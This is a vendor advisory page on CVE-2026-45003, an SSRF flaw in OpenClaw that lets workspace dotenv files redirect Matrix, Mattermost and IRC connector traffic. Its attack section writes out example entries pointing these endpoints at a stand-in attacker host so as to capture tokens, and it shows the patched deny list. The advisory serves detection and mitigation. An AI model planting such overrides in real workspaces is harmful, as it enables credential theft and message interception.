The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-45003

CVE-2026-45003: Openclaw SSRF Vulnerability

CVE-2026-45003 is an SSRF flaw in Openclaw that lets attackers with workspace access redirect connector traffic to malicious endpoints via dotenv files. This article covers technical details, affected versions, and mitigations.

Published: May 18, 2026

CVE-2026-45003 Overview

CVE-2026-45003 affects OpenClaw versions before 2026.4.22. The vulnerability allows workspace dotenv files to override connector endpoint hosts for Matrix, Mattermost, IRC, and Synology connectors. Attackers with workspace access can set endpoint variables in dotenv files to redirect runtime traffic to attacker-controlled endpoints. The flaw maps to [CWE-441] (Unintended Proxy or Intermediary, also known as Confused Deputy). OpenClaw lacked an allowlist that excluded connector endpoint variables from workspace-level overrides. The issue was patched in commit 0623079e98abf7202591f1b04a89755eb7ec9272.

Critical Impact

An attacker with write access to a workspace can silently redirect outbound connector traffic to malicious hosts, enabling credential capture and message interception for Matrix, Mattermost, IRC, and Synology integrations.

Affected Products

  • OpenClaw (Node.js distribution) versions prior to 2026.4.22
  • Matrix, Mattermost, IRC, and Synology connector integrations within OpenClaw
  • Workspaces that allow user-supplied dotenv files

Discovery Timeline

  • 2026-05-11 - CVE-2026-45003 published to NVD
  • 2026-05-13 - Last updated in NVD database

Technical Details for CVE-2026-45003

Vulnerability Analysis

OpenClaw loads environment variables from workspace-scoped dotenv files at runtime. These variables configure connector behavior, including the endpoint hosts used by Matrix, Mattermost, IRC, and Synology connectors. Before version 2026.4.22, the dotenv loader did not restrict which variables a workspace could override. As a result, variables such as MATRIX_HOMESERVER, MATTERMOST_URL, and IRC_HOST could be redefined per workspace, replacing the operator-configured endpoints with attacker-supplied values. The vulnerability is local in nature and requires workspace access, but it bypasses the trust boundary between workspace-level configuration and global connector configuration.

Root Cause

The root cause is missing input filtering in src/infra/dotenv.ts. The dotenv loader merged workspace variables into the process environment without enforcing an allowlist of safe keys. Connector endpoint variables were not present in the protected set, so workspace files could override them. This is a classic confused-deputy pattern where lower-privilege configuration is permitted to influence higher-privilege runtime behavior.

Attack Vector

An attacker with permission to edit a workspace dotenv file adds entries such as MATRIX_HOMESERVER=https://attacker.example, MATTERMOST_URL=https://attacker.example, or IRC_HOST=attacker.example. When OpenClaw next initializes connectors for that workspace, requests carrying authentication tokens and message payloads are sent to the attacker-controlled host instead of the legitimate service. The attacker can harvest credentials, intercept messages, or proxy traffic back to the real service to remain stealthy.

typescript
// Patch excerpt from src/infra/dotenv.ts
// fix(dotenv): block connector endpoint workspace overrides (#70240)
   "CLAWHUB_URL",
   "HTTP_PROXY",
   "HTTPS_PROXY",
+  "IRC_HOST",
+  "MATTERMOST_URL",
+  "MATRIX_HOMESERVER",
   "MINIMAX_API_HOST",
   "NODE_TLS_REJECT_UNAUTHORIZED",
   "NO_PROXY",
// Source: https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272

The patch adds IRC_HOST, MATTERMOST_URL, and MATRIX_HOMESERVER to the list of variables that workspace dotenv files cannot override.

Detection Methods for CVE-2026-45003

Indicators of Compromise

  • Workspace .env files containing MATRIX_HOMESERVER, MATTERMOST_URL, IRC_HOST, or Synology endpoint variables that differ from the global configuration.
  • Outbound connections from OpenClaw hosts to domains not associated with the organization's chat, IRC, or Synology infrastructure.
  • Connector authentication tokens or session cookies observed in network captures destined for unexpected hostnames.

Detection Strategies

  • Scan workspace directories for dotenv files and diff their keys against the allowlist defined in src/infra/dotenv.ts after upgrading.
  • Audit OpenClaw application logs for connector initialization entries that reference non-default endpoint hosts.
  • Compare DNS resolution and TLS Server Name Indication (SNI) values from OpenClaw processes against an approved endpoint list.

Monitoring Recommendations

  • Alert when OpenClaw process egress connects to hosts outside an allowlist of sanctioned Matrix, Mattermost, IRC, and Synology domains.
  • Track changes to workspace dotenv files using file integrity monitoring and Git history reviews.
  • Forward OpenClaw runtime logs to a central log platform and alert on connector endpoint configuration changes.

How to Mitigate CVE-2026-45003

Immediate Actions Required

  • Upgrade OpenClaw to version 2026.4.22 or later, which contains commit 0623079e98abf7202591f1b04a89755eb7ec9272.
  • Review every workspace dotenv file and remove any MATRIX_HOMESERVER, MATTERMOST_URL, IRC_HOST, or Synology endpoint entries.
  • Rotate credentials, API tokens, and bot secrets used by Matrix, Mattermost, IRC, and Synology connectors if workspace files were modified by untrusted users.

Patch Information

The fix is published in the OpenClaw repository as commit 0623079e98abf7202591f1b04a89755eb7ec9272 and is documented in GitHub Security Advisory GHSA-55cf-xx38-4p9p. Additional context is available in the VulnCheck Advisory on OpenClaw. The patch extends the protected-variable allowlist in src/infra/dotenv.ts to block workspace overrides of connector endpoint hosts.

Workarounds

  • Restrict write access to workspace directories and dotenv files to trusted administrators only.
  • Set connector endpoint variables in the global environment and remove them from workspace-scoped dotenv files.
  • Apply outbound network egress filtering so OpenClaw can only reach sanctioned connector endpoints.
bash
# Verify no workspace dotenv overrides connector endpoints
grep -RInE '^(MATRIX_HOMESERVER|MATTERMOST_URL|IRC_HOST)=' /path/to/openclaw/workspaces/

# Upgrade OpenClaw to the patched release
npm install openclaw@2026.4.22

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeSSRF

  • Vendor/TechOpenclaw

  • SeverityMEDIUM

  • CVSS Score4.1

  • EPSS Probability0.01%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityNone
  • CWE References
  • CWE-441
  • Technical References
  • GitHub Security Advisory GHSA-55cf-xx38-4p9p
  • Vendor Resources
  • GitHub Commit Changes

  • VulnCheck Advisory on OpenClaw
  • Related CVEs
  • CVE-2026-45000: Openclaw SSRF Vulnerability in CDP Profile

  • CVE-2026-43573: OpenClaw SSRF Policy Bypass Vulnerability

  • CVE-2026-43527: Openclaw SSRF Vulnerability

  • CVE-2026-42439: OpenClaw SSRF Policy Bypass Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English